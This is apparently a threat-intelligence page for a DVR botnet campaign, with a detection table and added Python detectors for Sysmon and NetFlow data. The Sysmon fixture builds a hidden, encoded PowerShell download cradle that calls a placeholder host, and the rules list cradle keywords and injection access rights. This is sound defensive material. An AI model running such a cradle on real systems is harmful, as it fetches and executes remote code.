
Nexcorium TBK DVR Campaign
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
DETECTIONS
| Technique ID | Technique Name | Tactic | Detection Method | Log Sources |
|---|---|---|---|---|
| | | | Monitor for abnormal cross-process memory operations (OpenProcess → WriteProcessMemory → CreateRemoteThread chain). Alert on legitimate system processes initiating unexpected outbound network connections, which may indicate a hijacked process. | Sysmon EID 8/10, Windows Security EID 4656/4663, EDR process telemetry |
| | | | Detect anomalous spikes in inbound packets-per-second or bandwidth utilization using threshold-based alerting. Look for geographic distribution anomalies and single-source request-rate patterns indicative of botnet coordination. | NetFlow/IPFIX, firewall logs, CDN/scrubbing-center metrics |
| T1080 | Taint Shared Content | Lateral Movement | Alert on executable files (.exe, .dll, .lnk, .bat, .ps1) written to shared network directories. Use File Integrity Monitoring (FIM) to detect hash changes on previously clean files in collaboration shares. | Sysmon EID 11, Windows Security EID 4663, FIM solution logs |
| T1566 | Phishing | Initial Access | Detonate email attachments in sandbox environments. Detect child processes spawned from Office applications (winword.exe, excel.exe → cmd.exe, powershell.exe, wscript.exe). Correlate URL clicks with subsequent download or shell activity on the same host. | Email gateway logs, Sysmon EID 1, proxy/web gateway, MDE alerts |
| T1059 | Command and Scripting Interpreter | Execution | Monitor for PowerShell launched with -EncodedCommand or download-cradle patterns (IEX, Invoke-Expression, WebClient). Alert on script interpreters spawned by unusual parent processes. Enable AMSI and PowerShell Script Block Logging for full command visibility. | Sysmon EID 1/4104, PowerShell Script Block Log, Windows Security EID 4688, auditd execve |
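The four Sysmon-based rows of the table (the OpenProcess → WriteProcessMemory → CreateRemoteThread chain, executables written to shares, Office applications spawning shells, and PowerShell -EncodedCommand or download cradles) expressed as one small rule set in Python and run over constructed Sysmon-style events. This is an added example, not code from the page or from any vendor detection content. The process lists, the pwsh.exe image, the PROCESS_CREATE_THREAD/PROCESS_VM_WRITE access-mask bits, the sample paths, PIDs and the example.invalid URL are assumptions or constructed test data; the EID 10 → EID 8 correlation keys on (source PID, target PID) and, unlike production code, does not bound the pair by time.

```python
import base64
import re
from pathlib import PureWindowsPath

# Constructed tunables (assumptions, not from the original page).
OFFICE_PARENTS = {"winword.exe", "excel.exe"}                 # parents named in the table
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe"}  # children named in the table
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}             # pwsh.exe added as an assumption
SHARE_EXTENSIONS = {".exe", ".dll", ".lnk", ".bat", ".ps1"}
CRADLE_RE = re.compile(r"\bIEX\b|Invoke-Expression|WebClient|DownloadString", re.I)
# -EncodedCommand and its abbreviations (-e, -ec, -enc, ...) followed by a base64 blob;
# the 16-character floor keeps "-ExecutionPolicy Bypass" from matching.
ENCODED_RE = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
# Win32 PROCESS_* rights an OpenProcess -> WriteProcessMemory -> CreateRemoteThread
# chain needs; Sysmon EID 10 reports the granted set in GrantedAccess.
PROCESS_CREATE_THREAD, PROCESS_VM_WRITE = 0x0002, 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_WRITE

# Constructed payload for the sample events, encoded the way -EncodedCommand expects (UTF-16LE).
CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENC = base64.b64encode(CRADLE_TEXT.encode("utf-16-le")).decode()

# Constructed Sysmon-style events; field names follow Sysmon's schema.
EVENTS = [
    {"EventID": 1, "ProcessId": 4412, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"cmd.exe /c powershell -w hidden -enc {ENC}"},
    {"EventID": 1, "ProcessId": 4420, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": f"powershell -w hidden -enc {ENC}"},
    {"EventID": 1, "ProcessId": 4500, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"EventID": 10, "SourceProcessId": 5120, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetProcessId": 3344, "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 8, "SourceProcessId": 5120, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetProcessId": 3344, "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 10, "SourceProcessId": 612, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetProcessId": 3344, "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1000"},
    {"EventID": 11, "ProcessId": 3344, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"\\fileserv01\projects\Q3\invoice.pdf.lnk"},
    {"EventID": 11, "ProcessId": 3344, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"\\fileserv01\projects\Q3\notes.docx"},
]


def basename(path):
    return PureWindowsPath(path).name.lower()


def alert(rule, pid, detail):
    return {"rule": rule, "pid": pid, "detail": detail}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_office_child(ev):
    """T1566 row: an Office application spawning a shell or script interpreter."""
    if (ev["EventID"] == 1 and basename(ev["ParentImage"]) in OFFICE_PARENTS
            and basename(ev["Image"]) in SHELL_CHILDREN):
        return alert("office_spawned_shell", ev["ProcessId"],
                     f'{basename(ev["ParentImage"])} -> {basename(ev["Image"])}')
    return None


def rule_powershell_cradle(ev):
    """T1059 row: cradle keywords on the visible command line and on the decoded -EncodedCommand payload."""
    if ev["EventID"] != 1 or basename(ev["Image"]) not in POWERSHELL_IMAGES:
        return None
    decoded = decode_encoded_command(ev["CommandLine"])
    for label, text in (("cmdline", ev["CommandLine"]), ("decoded", decoded or "")):
        hit = CRADLE_RE.search(text)
        if hit:
            return alert("powershell_download_cradle", ev["ProcessId"], f"{label}: {hit.group(0)}")
    if decoded is not None:  # encoded but no cradle keyword: still worth a lower-severity alert
        return alert("powershell_encoded_command", ev["ProcessId"], decoded[:80])
    return None


def rule_share_executable(ev):
    """T1080 row: executable content written to a network share (UNC target path)."""
    if (ev["EventID"] == 11 and ev["TargetFilename"].startswith("\\\\")
            and PureWindowsPath(ev["TargetFilename"]).suffix.lower() in SHARE_EXTENSIONS):
        return alert("executable_written_to_share", ev["ProcessId"], ev["TargetFilename"])
    return None


def detect_injection_chain(events):
    """First table row: EID 10 granting write+thread rights, then EID 8 from the same source into the same target."""
    armed, alerts = set(), []
    for ev in events:
        key = (ev.get("SourceProcessId"), ev.get("TargetProcessId"))
        if ev["EventID"] == 10 and (int(ev["GrantedAccess"], 16) & INJECT_MASK) == INJECT_MASK:
            armed.add(key)
        elif ev["EventID"] == 8 and key in armed:
            alerts.append(alert("remote_thread_after_vm_write", ev["SourceProcessId"],
                                f'{basename(ev["SourceImage"])} -> {basename(ev["TargetImage"])}'))
    return alerts


PER_EVENT_RULES = (rule_office_child, rule_powershell_cradle, rule_share_executable)


def run_detections(events):
    """Apply every rule to the event stream: per-event alerts first, then the correlated chain."""
    alerts = [a for ev in events for rule in PER_EVENT_RULES if (a := rule(ev))]
    return alerts + detect_injection_chain(events)


if __name__ == "__main__":
    for a in run_detections(EVENTS):
        print(f'{a["rule"]:30} pid={a["pid"]:<6} {a["detail"]}')
```

The encoded-command rule decodes the payload before matching, because the keywords the table lists never appear in the base64 text itself; the injection rule fires only when the EID 10 access mask actually includes thread-creation and memory-write rights, so routine query-only handle opens (such as the 0x1000 sample) stay silent.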
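The network row (threshold-based alerting on inbound packets-per-second, plus single-source and geographic concentration checks) as a rolling-baseline detector in Python over constructed per-minute flow summaries. This is an added example, not code from the page; the window size, the 3-sigma and 1000 pps thresholds, the share ratios, the RFC 5737 sample addresses and the "ZZ" placeholder country code are all assumptions, and the flow records stand in for whatever a NetFlow/IPFIX collector would export.

```python
import statistics
from collections import Counter, defaultdict

# Constructed tunables (assumptions, not from the original page).
BASELINE_WINDOW = 10       # minutes of history kept for the baseline
SIGMA_THRESHOLD = 3.0      # alert when pps exceeds baseline mean + 3 standard deviations
MIN_PPS_FLOOR = 1000       # absolute floor so a quiet link's jitter never alerts
TOP_SOURCE_SHARE = 0.20    # one source carrying >20% of packets: single-source pattern
TOP_COUNTRY_SHARE = 0.80   # one country carrying >80% of packets: geographic anomaly


def build_constructed_flows():
    """Constructed per-minute flow summaries as (minute, src_ip, country, packets).

    Minutes 0-11 carry steady traffic from 50 sources; in minute 11 an extra 400
    sources from a single placeholder country ("ZZ") flood the target.
    """
    flows = []
    for minute in range(12):
        for i in range(50):
            country = ("US", "DE", "GB", "FR")[i % 4]
            flows.append((minute, f"198.51.100.{i}", country, 600 + (i * 7) % 50 + (minute % 3) * 10))
    for j in range(400):
        src = f"203.0.113.{j}" if j < 256 else f"192.0.2.{j - 256}"
        flows.append((11, src, "ZZ", 6000))
    return flows


def summarize(flows):
    """Aggregate flows into per-minute packet totals and per-source / per-country counters."""
    per_minute = defaultdict(lambda: {"packets": 0, "by_src": Counter(), "by_country": Counter()})
    for minute, src, country, packets in flows:
        m = per_minute[minute]
        m["packets"] += packets
        m["by_src"][src] += packets
        m["by_country"][country] += packets
    return per_minute


def detect_spikes(flows):
    """Return one alert per minute whose inbound pps breaks the rolling baseline."""
    per_minute = summarize(flows)
    history, alerts = [], []
    for minute in sorted(per_minute):
        m = per_minute[minute]
        pps = m["packets"] / 60
        alerted = False
        if len(history) >= 2:  # a baseline needs some history before it means anything
            mean, stdev = statistics.mean(history), statistics.pstdev(history)
            if pps > MIN_PPS_FLOOR and pps > mean + SIGMA_THRESHOLD * stdev:
                top_src, top_src_pkts = m["by_src"].most_common(1)[0]
                top_country, top_country_pkts = m["by_country"].most_common(1)[0]
                alerts.append({
                    "minute": minute,
                    "pps": round(pps, 1),
                    "baseline_pps": round(mean, 1),
                    "distinct_sources": len(m["by_src"]),
                    "single_source": top_src_pkts / m["packets"] > TOP_SOURCE_SHARE,
                    "top_source": top_src,
                    "geo_anomaly": top_country_pkts / m["packets"] > TOP_COUNTRY_SHARE,
                    "top_country": top_country,
                })
                alerted = True
        if not alerted:  # keep attack minutes out of the baseline so they cannot raise it
            history = (history + [pps])[-BASELINE_WINDOW:]
    return alerts


if __name__ == "__main__":
    for a in detect_spikes(build_constructed_flows()):
        print(a)
```

Minutes that trigger an alert are deliberately excluded from the baseline, so a sustained flood cannot train the detector into silence; the alert carries the top source and top country so an analyst can tell a single noisy host from a distributed flood at a glance.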